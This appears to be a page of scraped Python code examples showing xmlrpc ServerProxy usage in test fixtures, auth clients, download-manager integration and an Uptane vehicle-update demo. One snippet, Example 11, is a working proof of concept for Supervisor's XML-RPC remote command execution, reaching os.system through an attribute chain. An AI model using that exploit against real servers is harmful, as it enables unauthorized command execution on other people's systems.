Ejemplo n.º 1
0
    def setUpClass(self):
        shutil.rmtree('./data/tests', ignore_errors=True)
        os.makedirs('./data/tests')

        def get_taskdb():
            return taskdb.TaskDB(self.taskdb_path)

        self.taskdb = get_taskdb()

        def get_projectdb():
            return projectdb.ProjectDB(self.projectdb_path)

        self.projectdb = get_projectdb()

        def get_resultdb():
            return resultdb.ResultDB(self.resultdb_path)

        self.resultdb = get_resultdb()

        self.newtask_queue = Queue(10)
        self.status_queue = Queue(10)
        self.scheduler2fetcher = Queue(10)
        self.rpc = xmlrpc_client.ServerProxy('http://localhost:%d' %
                                             self.scheduler_xmlrpc_port)

        def run_scheduler():
            scheduler = Scheduler(taskdb=get_taskdb(),
                                  projectdb=get_projectdb(),
                                  newtask_queue=self.newtask_queue,
                                  status_queue=self.status_queue,
                                  out_queue=self.scheduler2fetcher,
                                  data_path="./data/tests/",
                                  resultdb=get_resultdb())
            scheduler.UPDATE_PROJECT_INTERVAL = 0.1
            scheduler.LOOP_INTERVAL = 0.1
            scheduler.INQUEUE_LIMIT = 10
            Scheduler.DELETE_TIME = 0
            scheduler._last_tick = int(time.time())  # not dispatch cronjob
            run_in_thread(scheduler.xmlrpc_run,
                          port=self.scheduler_xmlrpc_port)
            scheduler.run()

        self.process = run_in_thread(run_scheduler)
        time.sleep(1)
Ejemplo n.º 2
0
    def _xml_rpc_auth(self):
        """
        Authenticates with the server using XML-RPC and returns the cookie's
        name and ID.
        """
        # TODO: This method should be replaced with SafeCookieTransfer class!!!
        import re
        import ssl
        import tempfile
        import six.moves.xmlrpc_client as xmlrpclib

        try:
            ssl_context = ssl.create_default_context(cafile=self.ca_cert)
            transport = xmlrpclib.SafeTransport(context=ssl_context)
        except TypeError:
            # py < 2.7.9
            transport = xmlrpclib.SafeTransport()


        hub = xmlrpclib.ServerProxy(
            urljoin(self.base_url, 'client'),
            allow_none=True,
            transport=transport,
            verbose=True)

        stdout = sys.stdout
        tmp_file = tempfile.TemporaryFile()
        try:
            sys.stdout = tmp_file
            hub.auth.login_password(self.auth.username, self.auth.password)
            tmp_file.seek(0)
            stdout_content = tmp_file.read()
        except xmlrpclib.Fault:
            raise RuntimeError('Failed to authenticate with the server')
        finally:
            sys.stdout = stdout
            tmp_file.close()

        pattern = re.compile('beaker_auth_token=[\w.-]*')
        results = pattern.findall(stdout_content)
        if not results:
            raise RuntimeError("Cookie not found")

        return {'beaker_auth_token': results[0].split('=')[1]}
Ejemplo n.º 3
0
def register_self_with_director():
    """
  Send the Director a message to register our ECU serial number and Public Key.
  In practice, this would probably be done out of band, when the ECU is put
  into the vehicle during assembly, not through the Secondary or Primary
  themselves.
  """
    # Connect to the Director
    server = xmlrpc_client.ServerProxy('http://' +
                                       str(demo.DIRECTOR_SERVER_HOST) + ':' +
                                       str(demo.DIRECTOR_SERVER_PORT))

    print('Registering Secondary ECU Serial and Key with Director.')
    server.register_ecu_serial(
        secondary_ecu.ecu_serial,
        uptane.common.public_key_from_canonical(secondary_ecu.ecu_key), _vin,
        False)
    print(GREEN + 'Secondary has been registered with the Director.' +
          ENDCOLORS)
Ejemplo n.º 4
0
    def __init__(self, url):
        if url.startswith('https://'):
            self._transport = GSSAPITransport()
        elif url.startswith('http://'):
            raise NitrateError(
                "Encrypted https communication required for "
                "GSSAPI authentication.\nURL provided: {0}".format(url))
        else:
            raise NitrateError("Unrecognized URL scheme: {0}".format(url))

        self._transport.cookiejar = CookieJar()
        # print("COOKIES:", self._transport.cookiejar._cookies)
        self.server = xmlrpclib.ServerProxy(url,
                                            transport=self._transport,
                                            verbose=VERBOSE,
                                            allow_none=1)

        # Login, get a cookie into our cookie jar:
        login_dict = self.do_command("Auth.login_krbv", [])
Ejemplo n.º 5
0
    def _init_supervisor_rpc(self, rpc_or_port):
        '''Initialize supervisor RPC.

        Allow passing in an RPC connection, or a port number for
        making one.

        '''
        if isinstance(rpc_or_port, int):
            if self.username:
                leader = 'http://{self.username}:{self.password}@'
            else:
                leader = 'http://'
            tmpl = leader + '{self.name}:{port}'
            url = tmpl.format(self=self, port=rpc_or_port)
            self.rpc = xmlrpc_client.ServerProxy(url,
                                                 transport=TimeoutTransport())
        else:
            self.rpc = rpc_or_port
        self.supervisor = self.rpc.supervisor
Ejemplo n.º 6
0
def register_self_with_primary():
  """
  Send the Primary a message to register our ECU serial number.
  In practice, this would probably be done out of band, when the ECU is put
  into the vehicle during assembly, not by the Secondary itself.
  """

  I_TO_PRINT = TO_PRINT + uptane.YELLOW + '[register_self_with_primary()]: ' + ENDCOLORS
  #TODO: Print to be deleted
  print(str('%s %s %s' % (I_TO_PRINT, 'Send the Primary a message to register our ECU serial number', secondary_ecu.ecu_serial)))
  #TODO: Until here

  # Connect to the Primary
  server = xmlrpc_client.ServerProxy(
    'http://' + str(_primary_host) + ':' + str(_primary_port))

  print('Registering Secondary ECU Serial and Key with Primary.')
  server.register_new_secondary(secondary_ecu.ecu_serial)
  print(GREEN + 'Secondary has been registered with the Primary.' + ENDCOLORS)
Ejemplo n.º 7
0
def submit_vehicle_manifest_to_director(signed_vehicle_manifest=None):

    global most_recent_signed_vehicle_manifest

    I_TO_PRINT = TO_PRINT + uptane.YELLOW + '[submit_vehicle_manifest_to_director()]: ' + uptane.ENDCOLORS

    if signed_vehicle_manifest is None:
        signed_vehicle_manifest = most_recent_signed_vehicle_manifest

    if tuf.conf.METADATA_FORMAT == 'der':
        # If we're working with DER ECU Manifests, check that the manifest to send
        # is a byte array, and encapsulate it in a Binary() object for XMLRPC
        # transmission.
        uptane.formats.DER_DATA_SCHEMA.check_match(signed_vehicle_manifest)
        signed_vehicle_manifest = xmlrpc_client.Binary(signed_vehicle_manifest)

    else:
        uptane.formats.SIGNABLE_VEHICLE_VERSION_MANIFEST_SCHEMA.check_match(
            signed_vehicle_manifest)

    server = xmlrpc_client.ServerProxy('http://' +
                                       str(demo.DIRECTOR_SERVER_HOST) + ':' +
                                       str(demo.DIRECTOR_SERVER_PORT))

    #TODO: Print to be deleted
    print(
        str('%s %s %s %s %s %s %s' % (
            I_TO_PRINT,
            'Connection already done. Submitting vehicle manifest to director with primary_ecu.vin:',
            primary_ecu.vin, 'primary_ecu.ecu_serial:', primary_ecu.ecu_serial,
            'signed_vehicle_manifest:', '?')))
    #TODO: Until here

    print("Submitting the Primary's manifest to the Director.")

    server.submit_vehicle_manifest(primary_ecu.vin, primary_ecu.ecu_serial,
                                   signed_vehicle_manifest)

    print(GREEN + 'Submission of Vehicle Manifest complete.' + ENDCOLORS)

    #TODO: Print to be deleted
    print(str('%s %s' % (I_TO_PRINT, 'Returning...')))
Ejemplo n.º 8
0
    def _login(self, force=False, verbose=False):
        """Login to the hub.
        - self._hub instance is created in this method
        - session information is stored in a cookie in self._transport
        """

        login_method_name = "_login_%s" % self._auth_method
        if not hasattr(self, login_method_name):
            raise ImproperlyConfigured("Unknown authentication method: %s" %
                                       self._auth_method)

        # create new self._hub instance (only once, when calling constructor)
        if self._hub is None:
            self._hub = xmlrpclib.ServerProxy(
                "%s/%s/" % (self._hub_url, self._client_type),
                allow_none=True,
                transport=self._transport,
                verbose=verbose)

        if force or self._hub.auth.renew_session():
            self._logger and self._logger.info("Creating new session...")
            try:
                # logout to delete current session information
                self._logout()
            except KeyboardInterrupt:
                raise
            except Exception as ex:
                self._logger and self._logger.error(
                    "Failed to log out: %s" % ex)

            try:
                login_method = getattr(self, login_method_name)
                login_method()
                self._logged_in = True
            except KeyboardInterrupt:
                raise
            except Exception as ex:
                self._logger and self._logger.debug(
                    "Failed to create new session: %s" % ex)
            else:
                self._logger and self._logger.info("New session created.")
Ejemplo n.º 9
0
def submit_ecu_manifest_to_primary(signed_ecu_manifest=None):

  I_TO_PRINT = TO_PRINT + uptane.YELLOW + '[submit_ecu_manifest_to_primary(signed_ecu_manifest)]: ' + uptane.ENDCOLORS
  #TODO: Print to be deleted
  print(str('%s %s %s' % (I_TO_PRINT, 'Submitting ECU manifest to primary. signed_ecu_manifest:', signed_ecu_manifest)))
  #TODO: Until here

  global most_recent_signed_ecu_manifest
  if signed_ecu_manifest is None:
    signed_ecu_manifest = most_recent_signed_ecu_manifest


  if tuf.conf.METADATA_FORMAT == 'der':
    # TODO: Consider validation of DER manifests as well here. (Harder)

    # If we're using ASN.1/DER data, then we have to transmit this slightly
    # differently via XMLRPC, wrapped in a Binary object.
    signed_ecu_manifest = xmlrpc_client.Binary(signed_ecu_manifest)

  else:
    # Otherwise, we're working with standard Python dictionary data as
    # specified in uptane.formats. Validate and keep as-is.
    uptane.formats.SIGNABLE_ECU_VERSION_MANIFEST_SCHEMA.check_match(
        signed_ecu_manifest)


  server = xmlrpc_client.ServerProxy(
      'http://' + str(_primary_host) + ':' + str(_primary_port))
  #if not server.system.listMethods():
  #  raise Exception('Unable to connect to server.')

  server.submit_ecu_manifest(
      secondary_ecu.vin,
      secondary_ecu.ecu_serial,
      secondary_ecu.nonce_next,
      signed_ecu_manifest)

  # We don't switch to a new nonce for next time yet. That only happens when a
  # time attestation using that nonce is validated.
  # "Nonces" may be sent multiple times, but only validated once.
  secondary_ecu.set_nonce_as_sent()
Ejemplo n.º 10
0
    def __init__(self, username, password, url, use_mod_auth_kerb=False):
        if url.startswith('https://'):
            self._transport = SafeCookieTransport()
        elif url.startswith('http://'):
            self._transport = CookieTransport()
        else:
            raise NitrateError("Unrecognized URL scheme")

        self._transport.cookiejar = CookieJar()
        # print("COOKIES:", self._transport.cookiejar._cookies)
        self.server = xmlrpclib.ServerProxy(url,
                                            transport=self._transport,
                                            verbose=VERBOSE,
                                            allow_none=1)

        # Login, get a cookie into our cookie jar:
        login_dict = self.do_command(
            "Auth.login", [dict(
                username=username,
                password=password,
            )])
Ejemplo n.º 11
0
def poc(url):
    url = url if '://' in url else 'http://' + url
    url = url.split('#')[0].split('?')[0].rstrip('/').rstrip('/index.php')

    command = "echo rivirsir"
    try:
        proxy = xmlrpc_client.ServerProxy(url + "/RPC2")
        old = getattr(proxy, 'supervisor.readLog')(0, 0)
        logfile = getattr(proxy,
                          'supervisor.supervisord.options.logfile.strip')()
        getattr(proxy,
                'supervisor.supervisord.options.warnings.linecache.os.system')(
                    '{} | tee -a {}'.format(command, logfile))
        result = getattr(proxy, 'supervisor.readLog')(0, 0)
        if result[len(old):].startswith("rivirsir"):
            return True
        else:
            return False
    except Exception as e:
        return False
    return False
Ejemplo n.º 12
0
    def __init__(self, opts, **kwargs):
        super(OpenNebulaBaseProvider, self).__init__(opts, **kwargs)

        self.on_auth = opts.on_auth
        self.on_rpcxml_endpoint = opts.on_rpcxml_endpoint
        self.all_images = opts.all_images

        if not self.on_auth:
            msg = ("ERROR, You must provide a on_auth "
                   "via either --on-auth or env[ON_AUTH]")
            raise exceptions.OpenNebulaProviderException(msg)

        if not self.on_rpcxml_endpoint:
            msg = ("You must provide an OpenNebula RPC-XML "
                   "endpoint via either --on-rpcxml-endpoint or"
                   " env[ON_RPCXML_ENDPOINT]")
            raise exceptions.OpenNebulaProviderException(msg)

        self.static = static.StaticProvider(opts)
        self.xml_parser = defusedxml.ElementTree
        self.server_proxy = xmlrpclib.ServerProxy(self.on_rpcxml_endpoint)
Ejemplo n.º 13
0
def register_self_with_director():
    """
  Send the Director a message to register our ECU serial number and Public Key.
  """

    I_TO_PRINT = TO_PRINT + uptane.YELLOW + '[register_self_with_director()]: ' + uptane.ENDCOLORS
    #TODO: Print to be deleted
    print(str('%s %s' % (I_TO_PRINT, 'Registering self with director')))
    #TODO: Until here

    #TODO: Print to be deleted
    print(
        str('%s %s %s %s %s %s %s' %
            (I_TO_PRINT, 'Connecting to the Director at port:',
             demo.DIRECTOR_SERVER_PORT, 'via http. Sending: ecu_serial:',
             primary_ecu.ecu_serial, 'public_key from canonical and vin:',
             _vin)))
    #TODO: Until here

    # Connect to the Director
    server = xmlrpc_client.ServerProxy('http://' +
                                       str(demo.DIRECTOR_SERVER_HOST) + ':' +
                                       str(demo.DIRECTOR_SERVER_PORT))

    #TODO: Print to be deleted
    print(
        str('%s %s' %
            (I_TO_PRINT, 'Connection already done. Sending information...')))
    #TODO: Until here

    print('Registering Primary ECU Serial and Key with Director.')
    server.register_ecu_serial(
        primary_ecu.ecu_serial,
        uptane.common.public_key_from_canonical(primary_ecu.primary_key), _vin,
        True)
    print(GREEN + 'Primary has been registered with the Director.' + ENDCOLORS)

    #TODO: Print to be deleted
    print(str('%s %s' % (I_TO_PRINT, 'Returning...')))
Ejemplo n.º 14
0
 def setUpClass(self):
     self.inqueue = Queue(10)
     self.outqueue = Queue(10)
     self.fetcher = Fetcher(self.inqueue, self.outqueue)
     self.fetcher.phantomjs_proxy = '127.0.0.1:25555'
     self.rpc = xmlrpc_client.ServerProxy('http://localhost:%d' % 24444)
     self.xmlrpc_thread = utils.run_in_thread(self.fetcher.xmlrpc_run,
                                              port=24444)
     self.httpbin_thread = utils.run_in_subprocess(httpbin.app.run,
                                                   port=14887)
     self.httpbin = 'http://127.0.0.1:14887'
     self.thread = utils.run_in_thread(self.fetcher.run)
     try:
         self.phantomjs = subprocess.Popen([
             'phantomjs',
             os.path.join(os.path.dirname(__file__),
                          '../pyspider/fetcher/phantomjs_fetcher.js'),
             '25555'
         ])
     except OSError:
         self.phantomjs = None
     time.sleep(0.5)
Ejemplo n.º 15
0
    def __init__(self, opts):
        super(OpenNebulaBaseProvider, self).__init__(opts)

        self.opts = opts
        self.on_auth = opts.on_auth
        self.on_rpcxml_endpoint = opts.on_rpcxml_endpoint
        self.cloudkeeper_images = opts.cloudkeeper_images

        if not self.on_auth:
            msg = ('ERROR, You must provide a on_auth '
                   'via either --on-auth or env[ON_AUTH]')
            raise exceptions.OpenNebulaProviderException(msg)

        if not self.on_rpcxml_endpoint:
            msg = ('You must provide an OpenNebula RPC-XML '
                   'endpoint via either --on-rpcxml-endpoint or'
                   ' env[ON_RPCXML_ENDPOINT]')
            raise exceptions.OpenNebulaProviderException(msg)

        self.static = providers.static.StaticProvider(opts)
        self.xml_parser = defusedxml.ElementTree
        self.server_proxy = xmlrpclib.ServerProxy(self.on_rpcxml_endpoint)
Ejemplo n.º 16
0
    def __init__(self, server, username, password, timeout=120):
        """
        Initializes a new Confluence XML RPC API client instance.

        :param server: URL of the Confluence server.
        :param username: username to use for authentication.
        :param password: password to use for authentication.

        Usage:

            >>> from confluence import Confluence
            >>>
            >>> conf = Confluence("http://localhost:8080", "admin", "admin")
            >>> conf.store_page_content("test", "test", "hello world!")

        """
        super(Confluence, self).__init__()
        # without this there is no timeout, and this may block the requests
        socket.setdefaulttimeout(timeout)

        self._server = xmlrpclib.ServerProxy(
            server + '/rpc/xmlrpc', allow_none=True)

        for version in "confluence2", "confluence1":
            try:
                self._token = getattr(self._server, version).login(
                    username, password)
                self.info("Logged in via \"%s\" as \"%s\"", version, username)
                self._version = version
                self._api = getattr(self._server, version)
                break
            except xmlrpclib.Error as e:
                self.debug("Failed \"%s\" login: %s", version, e)
        else:
            raise ValueError(
                "Could not login to %s as %s" % (server, username))
Ejemplo n.º 17
0
 def search(self, query):
     pypi = xmlrpc_client.ServerProxy(INDEX_URL)
     hits = pypi.search({'name': query, 'summary': query}, 'or')
     return hits
Ejemplo n.º 18
0
def get_latest_version():
    from six.moves import xmlrpc_client
    proxy = xmlrpc_client.ServerProxy('http://pypi.python.org/pypi')
    return proxy.package_releases('tendenci')[0]
Ejemplo n.º 19
0
import urllib
from six.moves.urllib.request import urlretrieve
from six.moves import filter
from six.moves import xmlrpc_client
import jinja2
import warnings
warnings.simplefilter('always', DeprecationWarning)

from metaextract import utils as meta_utils

import py2pack.proxy
import py2pack.requires
import py2pack.utils
from py2pack import version as py2pack_version

pypi = xmlrpc_client.ServerProxy('https://pypi.python.org/pypi')

SPDX_LICENSES_FILE = os.path.join(os.path.dirname(os.path.abspath(__file__)),
                                  'spdx_license_map.p')
SDPX_LICENSES = pickle.load(open(SPDX_LICENSES_FILE, 'rb'))


def _get_template_dirs():
    """existing directories where to search for jinja2 templates. The order
    is important. The first found template from the first found dir wins!"""
    return filter(
        lambda x: os.path.exists(x),
        [
            # user dir
            os.path.join(os.path.expanduser('~'), '.py2pack', 'templates'),
            # system wide dir
#!/usr/bin/python
import sys

import six
import six.moves.xmlrpc_client as xmlrpclib

if len(sys.argv) > 1:
    filename = sys.argv[1]
    with open(filename, 'rb') as f:
        text = f.read()
else:
    filename = 'stdin'
    text = sys.stdin.read()

s = xmlrpclib.ServerProxy('http://paste.openstack.org/xmlrpc/',
                          allow_none=True)
id = s.pastes.newPaste(None, text, None, filename)

print('http://paste.openstack.org/show/%s/' % id)
Ejemplo n.º 21
0
def sendNZB(nzb, proper=False):  # pylint: disable=too-many-locals, too-many-statements, too-many-branches, too-many-return-statements
    '''
    Sends NZB to NZBGet client

    :param nzb: nzb object
    :param proper: True if this is a Proper download, False if not. Defaults to False
    '''
    if sickbeard.NZBGET_HOST is None:
        logger.log(
            'No NZBget host found in configuration. Please configure it.',
            logger.WARNING)
        return False

    addToTop = False
    nzbgetprio = 0
    category = sickbeard.NZBGET_CATEGORY
    if nzb.show.is_anime:
        category = sickbeard.NZBGET_CATEGORY_ANIME

    url = 'http{0}://{1}:{2}@{3}/xmlrpc'.format(
        's' if sickbeard.NZBGET_USE_HTTPS else '', sickbeard.NZBGET_USERNAME,
        sickbeard.NZBGET_PASSWORD, sickbeard.NZBGET_HOST)

    nzbGetRPC = xmlrpc_client.ServerProxy(url)
    try:
        if nzbGetRPC.writelog(
                'INFO',
                'SickRage connected to drop off {0} any moment now.'.format(
                    nzb.name + '.nzb')):
            logger.log('Successful connected to NZBget', logger.DEBUG)
        else:
            logger.log(
                'Successful connected to NZBget, but unable to send a message',
                logger.WARNING)

    except http_client.socket.error:
        logger.log(
            'Please check your NZBget host and port (if it is running). NZBget is not responding to this combination',
            logger.WARNING)
        return False

    except xmlrpc_client.ProtocolError as e:
        if e.errmsg == 'Unauthorized':
            logger.log('NZBget username or password is incorrect.',
                       logger.WARNING)
        else:
            logger.log('Protocol Error: ' + e.errmsg, logger.ERROR)
        return False

    dupekey = ''
    dupescore = 0
    # if it aired recently make it high priority and generate DupeKey/Score
    for curEp in nzb.episodes:
        if dupekey == '':
            if curEp.show.indexer == 1:
                dupekey = 'SickRage-' + str(curEp.show.indexerid)
            elif curEp.show.indexer == 2:
                dupekey = 'SickRage-tvr' + str(curEp.show.indexerid)
        dupekey += '-' + str(curEp.season) + '.' + str(curEp.episode)
        if datetime.date.today() - curEp.airdate <= datetime.timedelta(days=7):
            addToTop = True
            nzbgetprio = sickbeard.NZBGET_PRIORITY
        else:
            category = sickbeard.NZBGET_CATEGORY_BACKLOG
            if nzb.show.is_anime:
                category = sickbeard.NZBGET_CATEGORY_ANIME_BACKLOG

    if nzb.quality != Quality.UNKNOWN:
        dupescore = nzb.quality * 100
    if proper:
        dupescore += 10

    nzbcontent64 = None
    if nzb.resultType == 'nzbdata':
        data = nzb.extraInfo[0]
        nzbcontent64 = standard_b64encode(data)

    logger.log('Sending NZB to NZBget')
    logger.log('URL: ' + url, logger.DEBUG)

    try:
        # Find out if nzbget supports priority (Version 9.0+), old versions beginning with a 0.x will use the old command
        nzbget_version_str = nzbGetRPC.version()
        nzbget_version = try_int(
            nzbget_version_str[:nzbget_version_str.find('.')])
        if nzbget_version == 0:
            if nzbcontent64:
                nzbget_result = nzbGetRPC.append(nzb.name + '.nzb', category,
                                                 addToTop, nzbcontent64)
            else:
                if nzb.resultType == 'nzb':
                    if not nzb.provider.login():
                        return False

                    data = nzb.provider.get_url(nzb.url, returns='content')
                    if data is None:
                        return False

                    nzbcontent64 = standard_b64encode(data)

                nzbget_result = nzbGetRPC.append(nzb.name + '.nzb', category,
                                                 addToTop, nzbcontent64)
        elif nzbget_version == 12:
            if nzbcontent64 is not None:
                nzbget_result = nzbGetRPC.append(nzb.name + '.nzb', category,
                                                 nzbgetprio, False,
                                                 nzbcontent64, False, dupekey,
                                                 dupescore, 'score')
            else:
                nzbget_result = nzbGetRPC.appendurl(nzb.name + '.nzb',
                                                    category, nzbgetprio,
                                                    False, nzb.url, False,
                                                    dupekey, dupescore,
                                                    'score')
        # v13+ has a new combined append method that accepts both (url and content)
        # also the return value has changed from boolean to integer
        # (Positive number representing NZBID of the queue item. 0 and negative numbers represent error codes.)
        elif nzbget_version >= 13:
            nzbget_result = nzbGetRPC.append(
                nzb.name + '.nzb', nzbcontent64
                if nzbcontent64 is not None else nzb.url, category, nzbgetprio,
                False, False, dupekey, dupescore, 'score') > 0
        else:
            if nzbcontent64 is not None:
                nzbget_result = nzbGetRPC.append(nzb.name + '.nzb', category,
                                                 nzbgetprio, False,
                                                 nzbcontent64)
            else:
                nzbget_result = nzbGetRPC.appendurl(nzb.name + '.nzb',
                                                    category, nzbgetprio,
                                                    False, nzb.url)

        if nzbget_result:
            logger.log('NZB sent to NZBget successfully', logger.DEBUG)
            return True
        else:
            logger.log(
                'NZBget could not add {0} to the queue'.format(nzb.name +
                                                               '.nzb'),
                logger.WARNING)
            return False
    except Exception:
        logger.log(
            'Connect Error to NZBget: could not add {0} to the queue'.format(
                nzb.name + '.nzb'), logger.WARNING)
        return False
Ejemplo n.º 22
0
 def _get_current_version_pip(self):
     client = xmlrpclib.ServerProxy('http://pypi.python.org/pypi')
     v = client.package_releases(self.uri)
     if v:
         return v[0]
Ejemplo n.º 23
0
def pypi_backend(release_name):
    """Actual PyPI backend. Uses an XMLRPC client to fetch release info"""
    pypi = xmlrpc_client.ServerProxy(PYPI_URL)
    return pypi.package_releases(release_name)[0]
Ejemplo n.º 24
0
def update_cycle():
    """
  Updates our metadata and images from the Primary. Raises the appropriate
  tuf and uptane errors if metadata or the image don't validate.
  """

    global secondary_ecu
    global current_firmware_fileinfo
    global attacks_detected

    # Connect to the Primary
    pserver = xmlrpc_client.ServerProxy('http://' + str(_primary_host) + ':' +
                                        str(_primary_port))

    # Download the time attestation from the Primary.
    time_attestation = pserver.get_time_attestation_for_ecu(_ecu_serial)
    if tuf.conf.METADATA_FORMAT == 'der':
        # Binary data transfered via XMLRPC has to be wrapped in an xmlrpc Binary
        # object. The data itself is contained in attribute 'data'.
        # When running the demo using ASN.1/DER mode, metadata is in binary, and
        # so this xmlrpc Binary object is used and the data should be extracted
        # from it like so:
        time_attestation = time_attestation.data

    # Download the metadata from the Primary in the form of an archive. This
    # returns the binary data that we need to write to file.
    metadata_archive = pserver.get_metadata(secondary_ecu.ecu_serial)

    # Validate the time attestation and internalize the time. Continue
    # regardless.
    try:
        secondary_ecu.validate_time_attestation(time_attestation)
    except uptane.BadTimeAttestation as e:
        print(
            "Timeserver attestation from Primary does not check out: "
            "This Secondary's nonce was not found. Not updating this Secondary's "
            "time this cycle.")
    except tuf.BadSignatureError as e:
        print(RED +
              "Timeserver attestation from Primary did not check out. Bad "
              "signature. Not updating this Secondary's time." + ENDCOLORS)
        attacks_detected += 'Timeserver attestation had bad signature.\n'

    #else:
    #  print(GREEN + 'Official time has been updated successfully.' + ENDCOLORS)

    # Dump the archive file to disk.
    archive_fname = os.path.join(secondary_ecu.full_client_dir,
                                 'metadata_archive.zip')

    with open(archive_fname, 'wb') as fobj:
        fobj.write(metadata_archive.data)

    # Now tell the Secondary reference implementation code where the archive file
    # is and let it expand and validate the metadata.
    secondary_ecu.process_metadata(archive_fname)

    # As part of the process_metadata call, the secondary will have saved
    # validated target info for targets intended for it in
    # secondary_ecu.validated_targets_for_this_ecu.

    # For now, expect no more than 1 target for an ECU. I suspect that the
    # reference implementation will eventually support more. For now, I've kept
    # things flexible in a number of parts of the reference implementation, in
    # this regard. The demo, though, doesn't have use for that tentative
    # flexibility.

    if len(secondary_ecu.validated_targets_for_this_ecu) == 0:
        print_banner(
            BANNER_NO_UPDATE,
            color=WHITE + BLACK_BG,
            text='No validated targets were found. Either the Director '
            'did not instruct this ECU to install anything, or the target info '
            'the Director provided could not be validated.')
        # print(YELLOW + 'No validated targets were found. Either the Director '
        #     'did not instruct this ECU to install anything, or the target info '
        #     'the Director provided could not be validated.' + ENDCOLORS)
        generate_signed_ecu_manifest()
        submit_ecu_manifest_to_primary()
        return

    #elif len(secondary_ecu.validated_targets_for_this_ecu) > 1:
    #  assert False, 'Multiple targets for an ECU not supported in this demo.'

    expected_target_info = secondary_ecu.validated_targets_for_this_ecu[-1]

    expected_image_fname = expected_target_info['filepath']
    if expected_image_fname[0] == '/':
        expected_image_fname = expected_image_fname[1:]

    # Since metadata validation worked out, check if the Primary says we have an
    # image to download and then download it.
    # TODO: <~> Cross-check this: we have the metadata now, so we and the Primary
    # should agree on whether or not there is an image to download.
    if not pserver.update_exists_for_ecu(secondary_ecu.ecu_serial):

        print_banner(
            BANNER_NO_UPDATE,
            color=WHITE + BLACK_BG,
            text='Primary reports that there is no update for this ECU.')
        # print(YELLOW + 'Primary reports that there is no update for this ECU.')
        (image_fname, image) = pserver.get_image(secondary_ecu.ecu_serial)
        generate_signed_ecu_manifest()
        submit_ecu_manifest_to_primary()
        return

    # Download the image for this ECU from the Primary.
    (image_fname, image) = pserver.get_image(secondary_ecu.ecu_serial)

    if image is None:
        print(YELLOW +
              'Requested image from Primary but received none. Update '
              'terminated.' + ENDCOLORS)
        attacks_detected += 'Requested image from Primary but received none.\n'
        generate_signed_ecu_manifest()
        submit_ecu_manifest_to_primary()
        return

    elif not secondary_ecu.validated_targets_for_this_ecu:
        print(
            RED + 'Requested and received image from Primary, but metadata '
            'indicates no valid targets from the Director intended for this ECU. '
            'Update terminated.' + ENDCOLORS)
        # TODO: Determine if something should be added to attacks_detected here.
        generate_signed_ecu_manifest()
        submit_ecu_manifest_to_primary()
        return

    elif image_fname != expected_image_fname:
        # Make sure that the image name provided by the Primary actually matches
        # the name of a validated target for this ECU, otherwise we don't need it.
        print(
            RED + 'Requested and received image from Primary, but this '
            'Secondary has not validated any target info that matches the given '
            + 'filename. Expected: ' + repr(expected_image_fname) +
            '; received: ' + repr(image_fname) + '; aborting "install".' +
            ENDCOLORS)
        # print_banner(
        #     BANNER_DEFENDED, color=WHITE+DARK_BLUE_BG,
        #     text='Image from Primary is not listed in trusted metadata. Possible '
        #     'attack from Primary averted. Image: ' +
        #     repr(image_fname))#, sound=TADA)
        attacks_detected += 'Received unexpected image from Primary with ' + \
            'unexpected filename.\n'
        generate_signed_ecu_manifest()
        submit_ecu_manifest_to_primary()
        return

    # Write the downloaded image binary data to disk.
    unverified_targets_dir = os.path.join(CLIENT_DIRECTORY,
                                          'unverified_targets')
    if not os.path.exists(unverified_targets_dir):
        os.mkdir(unverified_targets_dir)
    with open(os.path.join(unverified_targets_dir, image_fname), 'wb') as fobj:
        fobj.write(image.data)

    # Validate the image against the metadata.
    try:
        secondary_ecu.validate_image(image_fname)
    except tuf.DownloadLengthMismatchError:
        print_banner(
            BANNER_DEFENDED,
            color=WHITE + DARK_BLUE_BG,
            text=
            'Image from Primary failed to validate: length mismatch. Image: ' +
            repr(image_fname),
            sound=TADA)
        # TODO: Add length comparison instead, from error.
        attacks_detected += 'Image from Primary failed to validate: length ' + \
            'mismatch.\n'
        generate_signed_ecu_manifest()
        submit_ecu_manifest_to_primary()
        return
    except tuf.BadHashError:
        print_banner(
            BANNER_DEFENDED,
            color=WHITE + DARK_BLUE_BG,
            text='Image from Primary failed to validate: hash mismatch. Image: '
            + repr(image_fname),
            sound=TADA)
        # TODO: Add hash comparison instead, from error.
        attacks_detected += 'Image from Primary failed to validate: hash ' + \
            'mismatch.\n'
        generate_signed_ecu_manifest()
        submit_ecu_manifest_to_primary()
        return

    if secondary_ecu.firmware_fileinfo == expected_target_info:
        print_banner(
            BANNER_NO_UPDATE_NEEDED,
            color=WHITE + BLACK_BG,
            text=
            'We already have installed the firmware that the Director wants us '
            'to install. Image: ' + repr(image_fname))
        generate_signed_ecu_manifest()
        submit_ecu_manifest_to_primary()
        return

    # Inspect the contents of 'image_fname' and search for the string: "evil
    # content".  If this single string is found in any of the images downloaded,
    # print a BANNER_COMPROMISED banner.
    image_filepath = os.path.join(CLIENT_DIRECTORY, 'unverified_targets',
                                  image_fname)

    # Simulate installation. (If the demo eventually uses pictures to move into
    # place or something, here is where to do it.)
    # 1. Move the downloaded image from the unverified targets subdirectory to
    #    the root of the client directory.
    current_firmware_filepath = os.path.join(CLIENT_DIRECTORY, image_fname)

    if os.path.exists(current_firmware_filepath):
        os.remove(current_firmware_filepath)

    os.rename(image_filepath, current_firmware_filepath)

    # 2. Set the fileinfo in the secondary_ecu object to the target info for the
    #    new firmware.
    secondary_ecu.firmware_fileinfo = expected_target_info

    with open(current_firmware_filepath, 'rb') as file_object:
        if file_object.read() == b'evil content':
            # If every safeguard is defeated and a compromised update is delivered, a
            # real Secondary can't necessarily know it has been compromised, as every
            # check has passed. For the purposes of the demo, of course, we know when
            # a compromise has been delivered, and we'll flash a Compromised screen
            # to indicate a successful attack. We know this has happened because the
            # demo should include 'evil content' in the file.  This requires,
            # generally, a compromise of both Image Repo and Director keys.
            print_banner(
                BANNER_COMPROMISED,
                color=WHITE + RED_BG,
                text=
                'A malicious update has been installed! Arbitrary package attack '
                'successful: this Secondary has been compromised! Image: ' +
                repr(expected_image_fname),
                sound=WITCH)

        else:
            print_banner(
                BANNER_UPDATED,
                color=WHITE + GREEN_BG,
                text='Installed firmware received from Primary that was fully '
                'validated by the Director and Image Repo. Image: ' +
                repr(image_fname),
                sound=WON)

    if expected_target_info['filepath'].endswith('.txt'):
        print('The contents of the newly-installed firmware with filename ' +
              repr(expected_target_info['filepath']) + ' are:')
        print('---------------------------------------------------------')
        print(open(os.path.join(CLIENT_DIRECTORY, image_fname)).read())
        print('---------------------------------------------------------')

    # Submit info on what is currently installed back to the Primary.
    generate_signed_ecu_manifest()
